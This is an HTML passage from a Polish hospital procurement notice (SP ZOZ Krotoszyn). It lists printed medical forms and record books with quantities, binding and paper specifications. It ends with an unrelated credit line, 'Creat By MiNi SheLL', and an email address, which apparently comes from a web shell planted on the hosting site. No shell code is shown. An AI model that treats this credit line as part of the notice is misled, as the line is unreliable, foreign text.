162.	F 0081	Zlecenie na zabiegi dokonywane przez felczerów / pielęgniarki	6	A5 dwustr.
163.	NFZ-1	Zlecenie na zaopatrzenie w środki pomocnicze przyslugujące comiesięcznie część a10	A4 dwustr.
164.	NFZ-2	Zlecenie na zaopatrzenie w wwyroby medyczne będące przedmiotami ortopedycznymi  i środki pomocnicze	55	A4 dwustr.
165.	S-16-LC	Zlecenie wykonania badań diagnostycznych w laboratorium centralnym SP ZOZ Krotoszyn (skierowanie na bad. Lab.)	675	A5 dwustr.
166.	S-17-LC	Zlecenie wykonania badań mikrobiologicznych w pracowni bakteriologicznej SP ZOZ Krotoszyn	240	A5 jednostr.
167.	F 0089	Zlecenie wykonania konsultacji samokopia	14	A5 kopia
Wymagania dotyczące druków:
1.Bloczek powinien zawierć 100 kartek.
2. Oznakowanie druków zgodnie z kolumną nr 2 (oznaczenie dokumentacji) w dolnym lewym lub prawym rogu .
3. Bloczki przekładane przekładką.
4. Druki powinny być wykonane na papierze offsetowym o gramaturze 80g/m2 z wyłączeniem poz. 39,73,107..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.00.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 - Księgi medyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	K.005	Księga fenyloketonuria hypotyreoza / Oddz. Nowor./ sztywna,60kartek,szyta,pionowa	2	A4 / 60 kartek
2.	K.010	Księga badań grup krwi / pozioma, 200kartek,szyta, sztywna	10	A4/ 200 kartek
3.	K.011	Księga badań przeciwciał  i kwalifikacji do podania immunoglobuliny anty-d / pozioma, 200kartek,szyta, sztywna	2	A4 / 200 kartek
4.	K.014	Księga ewidencji dializ / sztywna, nici, A4, 100 kartek 	4	A4 / 100 kartek
5.	K.020	Księga przyjęć - por. G-P. / format A4, szyta,sztywna 100 kartek	16	A4 / 100 kartek
6.	K.021	Księga pracowni hematologicznej I/ 200kartek,szyta,sztywna	15	A4 / 200 kartek
7.	K.022	Księga pracowni hematologicznej II / 200kartek,szyta,sztywna	3	A4 / 200 kartek
8.	K.023	Księga hemodializ  / sztywna,zszywacze, A4, 80 kartek, dziury do segreg.,pieczątka zgoda na zabiegi HD	100	A4/80 kartek
9.	K.029	Księga kontroli środków odurzających i psychotropowych /A4 MZF-50 numeracja + otwory	26	a4/100 numer str, otwory
10.	K.031	Księga noworodków/ sztywna,szyta,pozioma,100 kartek	2	A4 / 100 kartek
11.	K.032	Księga odbioru wyników badań (L.C.) 100 kart	5	A4 / 100 kartek
12.	K.036	Księga pracowni immunochemicznej I	15	A4 / 100 kartek
13.	K.037	Księga pracowni analitycznej - bad. Kału / 200kartek,szyta,sztywna	2	A4 / 200 kartek
14.	K.038	Księga pracowni analitycznej - bad. Moczu / 200kartek,szyta,sztywna	10	A4 / 200 kartek
15.	K.039	Księga pracowni analitycznej CARDIAk / 200kartek,szyta,sztywna	6	A4 / 200 kartek
16.	K.040	Księga pracowni analitycznej hormony tarczycy / 200kartek,szyta,sztywna	3	A4 / 200 kartek
17.	K.041	Księga pracowni biochemicznej / 200kartek,szyta,sztywna	80	A4 / 200 kartek
18.	K.042	Księga pracowni cytologicznej /A4 200 kartek szyta	2	A4 / 200 kartek
19.	K.046	Księga profilaktyka konfliktu Rh - GIN-POŁ /A4 200 kartek szyta	2	A4 / 200 kartek
20.	K.047	Księga prób zgodności / pozioma,200kartek, szyta,sztywna	6	A4 / 200 kartek
21.	K.048	Księga przychodów i rozchodów preparatów krwiopochodnych banku krwi / pozioma, szyta,sztywna, 200 kartek	4	A4 / 200 kartek
22.	K.049	Księga pracowni immunochemicznej II	5	A4 / 200 kartek
23.	K.050	Księga raportów lekarskich / format A4, szyta,sztywna 100 kartek numeracja stron, otwory	44	A4 nr stron, otwory
24.	K.051	Księga sterylizacji /A4 100 kart szyta sztywna opr	4	A4 / 100 kartek
25.	K.053	Księga transfuzyjna /A4 100 kart opr sztywna	5	A4 / 100 kartek
26.	K.055	Księga wymazów cytologicznych- Por.K /A4 200 kart opr.sztyw.	2	A4 / 200 kartek
27.	K.061	Księga przyjęć - AOS / szyta	62	A4 / 100 kartek
28.	K.062	Księga glówna przyjęć i wypisów /szyta	17	A4 / 100 kartek
29.	K.063	Księga chorych oddzialu / szyta	29	A4 / 100 kartek
30.	K.064	Księga raportów pielęniarskich	262	A4 / 100 kartek
31.	K.065	Księga zabiegów 	179	A4 / 100 kartek
32.	K.068	Księga rejestracji/A4 100 kartek szyta	2	A4 / 100 kartek
33.	K.070	Księga pracowni diagnostycznej - pracownia endoskopowa	12	A4 / 100 kartek
34.	K.071	Księga bloku operacyjnego / perforowana	28	A4 samokopia - dwa kol.  / 100 kartek
35.	K.072	Księga druków ścisłego zarachowania /A4 40 kartek	3	A4 / 40 kartek
36.	K.073	księga ewidencji pacjentów w pracowni endoskopii	2	A4 / 100 kartek
37.	K.079	Księga pracowni  bakteriologicznej / 200kartek,szyta,sztywna, format 2/3A3	15	2/3 A3/ 200 kartek
38.	K.081	Księga pracowni diagnostycznej np.: usg,rtg,tk,mm	65	A4 / 100 kartek
39.	K.082	Księga Sali porodowej /A4 200 kartek szyta	2	A4 / 200 kartek
40.	K.084	Księga zabiegów leczniczych ZLU / A3 200kartek,szyta,sztywna	10	A3/200 kartek
41.	K.088	Rejestr codziennego badania wody - st.dializ	4	A4 / 100 kartek
42.	K.089	Skorowidz do księgi głównej szpitala /szyta	5	2/3 A4
43.	K.090	Księga odmów przyjęć i porad ambulatoryjnych	12	A4 / 100 kartek
44.	K.091	Księga porad ambulatoryjnych POZ/ A4 200 stron	37	A4 / 200 kartek
45.	K.092	Księga dysponenta zespolów ratownictwa medycznego	10	A4 / 100 kartek
46.	K.093	Księga wyjazdów - transporty sanitarne	10	A4 / 100 kartek

Wymagania dotyczące książek:
1. Księga poniżej 100 kartek - oprawa 250gr/m2.
2. Księga 100 kartkowa - oprawa 400gr/m2, szyte nićmi i klejone.
3. Księga powyżej 100 kartek - oprawa 900gr/m2, szyte nićmi i klejone.
4. Każda księga musi posiadać numerację stron.
5. Nazwa księgi z kolumny nr 3  oraz symbol z kolumny nr 2 na okładce.
6. Druki powinny być wykonane na papierze offsetowym o gramaturze 80g/m2.
7. Dotyczy: Lp. 34 K071 - Księga Bloku operacyjnego - samokopiująca, 200 kartek: kartka kopii ma taką samą numerację jak oryginał (co daje w sumie 100 stron), kopia koloru jasnozielonego, perforowana..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.11.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com